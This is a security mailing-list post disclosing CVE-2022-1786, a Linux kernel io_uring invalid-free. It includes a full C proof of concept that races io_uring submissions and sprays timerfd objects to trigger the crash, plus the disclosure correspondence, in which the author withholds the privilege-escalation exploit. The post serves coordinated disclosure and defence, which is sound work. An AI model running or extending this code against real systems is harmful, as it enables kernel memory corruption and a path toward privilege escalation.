oss-sec mailing list archives

Re: CVE-2022-1786: Linux Kernel invalid-free in io_uring


From: Kyle Zeng <zengyhkyle () gmail com>
Date: Sat, 28 May 2022 01:26:27 -0700

Hi all,

A minimal crashing PoC for CVE-2022-1786 is included below.
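
In short, the PoC races two threads calling io_uring_enter() on one
IORING_SETUP_IOPOLL ring, then sprays timerfd objects to reclaim the
freed object and make the invalid free visible. Assuming the code below
is saved as poc.c, it should build with something like:

    gcc -O2 -pthread poc.c -o poc

(the file name and flags are my choice; any reasonable invocation
works). Run it on a vulnerable kernel and watch dmesg for the
invalid-free report.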

Kyle

=-=-=-=-=-=-=-=
#define _GNU_SOURCE

#include <dirent.h>
#include <endian.h>
#include <errno.h>
#include <pthread.h>
#include <sched.h>
#include <setjmp.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/mount.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>
#include <assert.h>
#include <fcntl.h>
#include <linux/fs.h>
#include <sys/msg.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <sys/timerfd.h>
#include <sys/xattr.h>

#include <linux/capability.h>
#include <linux/futex.h>
#include <linux/io_uring.h>

// raw io_uring interface, no liburing; syscall numbers are guarded below for
// older headers
#define u64 unsigned long long
#define u32 unsigned int

# ifndef __NR_io_uring_setup
#  define __NR_io_uring_setup 425
# endif
# ifndef __NR_io_uring_enter
#  define __NR_io_uring_enter 426
# endif
# ifndef __NR_io_uring_register
#  define __NR_io_uring_register 427
# endif

int fd_io_uring;
#define GROOM_NUM 0x20
u64 cpu_num = 4;
u64 work_num = 0x200;
char fname[] = "/etc/passwd";
u64 heap_addr;
int target_shmid;
char timerfd_backup[0x100];
#define NAP_TIME1 50000
#define NAP_TIME2 50000
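// note: GROOM_NUM, cpu_num, heap_addr, target_shmid, timerfd_backup and the
// NAP_TIME* constants are unused in this minimal PoC; they look like
// leftovers from the full LPE exploit it was minimized from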

void set_cpu(int cpuid)
{
    cpu_set_t my_set;
    CPU_ZERO(&my_set);
    CPU_SET(cpuid, &my_set);
    assert(sched_setaffinity(0, sizeof(my_set), &my_set) == 0);
}

void increase_limit()
{
    int ret;
    struct rlimit open_file_limit;

    /* Query current soft/hard value */
    ret = getrlimit(RLIMIT_NOFILE, &open_file_limit);
    assert(ret >= 0);

printf("[*] file limit: %d\n", open_file_limit.rlim_max);

    /* Set soft limit to hard limit */
    open_file_limit.rlim_cur = open_file_limit.rlim_max;
    ret = setrlimit(RLIMIT_NOFILE, &open_file_limit);
    assert(ret >= 0);
}

struct cq_ring_t {
    u32 *head;
    u32 *tail;
    u32 *ring_mask;
    u32 *ring_entries;
    struct io_uring_cqe *cqes;
};

struct sq_ring_t {
    u32 *head;
    u32 *tail;
    u32 *ring_mask;
    u32 *ring_entries;
    u32 *flags;
    u32 *array;
};

struct uring_mgr_t {
    int fd;
    struct sq_ring_t sq_ring;
    struct cq_ring_t cq_ring;
    struct io_uring_sqe *sqes;
};

#define IORING_OP_WRITE 23
#define IORING_OP_READ 22
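// (the two fallback defines above match the kernel's enum io_uring_op values,
// for headers too old to provide IORING_OP_READ/IORING_OP_WRITE)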

struct uring_mgr_t mgr;
void uring_mgr_setup(struct uring_mgr_t *mgr, u32 entries)
{
    // create io_uring fd
    struct io_uring_params setup_params = {0};
    setup_params.flags = IORING_SETUP_IOPOLL;
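    // IOPOLL is essential here: CVE-2022-1786 is only reachable when more
    // than one task completes submissions on an IORING_SETUP_IOPOLL ring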
    mgr->fd = syscall(__NR_io_uring_setup, entries, &setup_params);
    assert(mgr->fd >= 0);

    // map the SQ/CQ ring buffer and the SQE (submission queue entry) array
    uint32_t sq_ring_sz = setup_params.sq_off.array + setup_params.sq_entries * sizeof(uint32_t);
    uint32_t cq_ring_sz = setup_params.cq_off.cqes + setup_params.cq_entries * sizeof(struct io_uring_cqe);
    uint32_t ring_sz = sq_ring_sz > cq_ring_sz ? sq_ring_sz : cq_ring_sz;
    uint32_t sqes_sz = setup_params.sq_entries * sizeof(struct io_uring_sqe);
    void *ring_ptr = mmap(NULL, ring_sz, PROT_READ | PROT_WRITE,
                          MAP_SHARED | MAP_POPULATE, mgr->fd, IORING_OFF_SQ_RING);
    assert(ring_ptr != MAP_FAILED);
    mgr->sqes = (struct io_uring_sqe *) mmap(NULL, sqes_sz, PROT_READ | PROT_WRITE,
                          MAP_SHARED | MAP_POPULATE, mgr->fd, IORING_OFF_SQES);
    assert(mgr->sqes != MAP_FAILED);

    // now initialize the completion queue
    struct cq_ring_t *cq_ring = &mgr->cq_ring;
    cq_ring->head = (u32 *)((long)ring_ptr + setup_params.cq_off.head);
    cq_ring->tail = (u32 *)((long)ring_ptr + setup_params.cq_off.tail);
    cq_ring->ring_mask = (u32 *)((long)ring_ptr + setup_params.cq_off.ring_mask);
    cq_ring->ring_entries = (u32 *)((long)ring_ptr + setup_params.cq_off.ring_entries);
    cq_ring->cqes = (struct io_uring_cqe *)((long)ring_ptr + setup_params.cq_off.cqes);

    // now initialize the submission queue
    struct sq_ring_t *sq_ring = &mgr->sq_ring;
    sq_ring->head = (u32 *)((long)ring_ptr + setup_params.sq_off.head);
    sq_ring->tail = (u32 *)((long)ring_ptr + setup_params.sq_off.tail);
    sq_ring->ring_mask = (u32 *)((long)ring_ptr + setup_params.sq_off.ring_mask);
    sq_ring->ring_entries = (u32 *)((long)ring_ptr + setup_params.sq_off.ring_entries);
    sq_ring->flags = (u32 *)((long)ring_ptr + setup_params.sq_off.flags);
    sq_ring->array = (u32 *)((long)ring_ptr + setup_params.sq_off.array);
}

int *flag;
u64 val;
u64 *val_ptr = &val;
u64 elapse_time[2];
void *func(void *arg) {
    int cpuid = (int)(long)arg;
    set_cpu(cpuid);
    // spin until the parent releases both workers, so the two
    // io_uring_enter() calls hit the kernel at the same time
    while(*flag == 0);
    syscall(__NR_io_uring_enter, fd_io_uring, work_num/2, work_num/2,
            IORING_ENTER_GETEVENTS, NULL, 0);
    __atomic_fetch_add(&val, 1, __ATOMIC_SEQ_CST);
    return NULL;
}


void trigger_free()
{
    uring_mgr_setup(&mgr, work_num);
    fd_io_uring = mgr.fd;
printf("fd_io_uring: %d\n", fd_io_uring);

    // open some file
    // fd = open("/etc/passwd", O_RDONLY|O_NONBLOCK|O_DIRECT|O_SYNC);
    int fds[work_num];
puts(fname);
    for(int i=0; i<work_num; i++) {
        fds[i] = open(fname, O_RDONLY|O_NONBLOCK|O_DIRECT|O_SYNC);
        assert(fds[i] >= 0);
    }
    printf("fd: %d\n", fds[0]);
    assert(fds[0] >= 0);

    // SQE: submission queue entries
    // large 'A'-filled user buffer used as the read destination
    void *buf = mmap(NULL, 0x5000000, PROT_READ|PROT_WRITE,
                     MAP_ANON|MAP_PRIVATE, -1, 0);
    assert(buf != MAP_FAILED);
    memset(buf, 'A', 0x5000000);

    struct io_uring_sqe sqe = {
        .opcode = IORING_OP_READ,
        .flags = 0,
        .ioprio = 0,
        .fd = -1,
        .off = 0,
        .addr = (u64)buf,
        .len = 0x5000000,
    };
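    // this is a template: .fd is patched per request in the submission loop
    // below, so each SQE reads through its own file descriptor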

    // now submit the request
    struct sq_ring_t *sq_ring = &mgr.sq_ring;
    struct cq_ring_t *cq_ring = &mgr.cq_ring;
    u32 index, tail, next_tail;
    next_tail = tail = *sq_ring->tail;
    next_tail++;
    // barrier();
    // copy one request per fd into the SQE buffer, and point each SQ array
    // slot at its own SQE
    index = tail & *mgr.sq_ring.ring_mask;
    for(int i=0; i<work_num; i++) {
        sqe.fd = fds[i];
        memcpy(&mgr.sqes[index+i], &sqe, sizeof(struct io_uring_sqe));
        sq_ring->array[index+i] = index+i;
    }

    tail = next_tail;
    assert(*sq_ring->tail != tail);
    // publish all work_num entries at once; the two racing threads below
    // each submit and complete half of them
    *sq_ring->tail = work_num;

    set_cpu(2);

    pthread_t tids[2];
    int ret;
    for(int i=0; i<2; i++) {
        ret = pthread_create(&tids[i], NULL, func, (void *)(long)i);
        assert(ret == 0);
    }
    // release both worker threads at once so their submissions race
    *flag = 1;
    // sleep(1);
    while(*val_ptr != 2);
    pthread_join(tids[0], NULL);
    pthread_join(tids[1], NULL);

    // sleep(1000);
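    // note: execve() on "/" just fails (it is a directory); teardown actually
    // happens via close()/exit() below, so this looks like a leftover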
    execve("/", NULL, NULL);
    close(fd_io_uring);
    exit(0);
}

void attempt()
{
    flag = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_ANON, -1, 0);
    assert(flag != MAP_FAILED);
    if(!fork()) {
        trigger_free();
    } else {
        wait(NULL);
        // after the child dies, spray timerfd objects to reclaim the slab
        // object it freed, so the invalid free turns into a visible crash
        for(int i=0; i<0x100; i++) timerfd_create(CLOCK_REALTIME, 0);
    }
}


int main() {
    puts("========================================================================");

    increase_limit();
    set_cpu(0);

    // the race is probabilistic, so retry it many times, each attempt in a
    // fresh child process
    for(int i=0; i<10000; i++) {
        printf("i: %d\n", i);
        usleep(10000);
        if(!fork()) {
            attempt();
            exit(0);
        } else {
            wait(NULL);
        }
    }
    puts("Done");
    return 0;
}
=-=-=-=-=-=-=-=

On Tue, May 24, 2022 at 9:28 AM Kyle Zeng <zengyhkyle () gmail com> wrote:

A small correction: I shared a minimal crashing PoC with linux-distros,
not the LPE exploit. I do not plan to share the LPE exploit, for
ethical reasons.

To answer your question: I intend to post the crashing PoC on May
27th. Thanks for reminding me.

Kyle

On Tue, May 24, 2022 at 9:22 AM Solar Designer <solar () openwall com> wrote:

On Tue, May 24, 2022 at 09:10:37AM -0700, Kyle Zeng wrote:
# Impact
I wrote a proof-of-concept exploit and demonstrated that it can be
used to achieve local privilege escalation.

Since you shared the PoC exploit with linux-distros, you're supposed to
also post that to oss-security within 7 days of your first posting
above, so by or on May 31.  Do you intend to, and when exactly?

Alexander

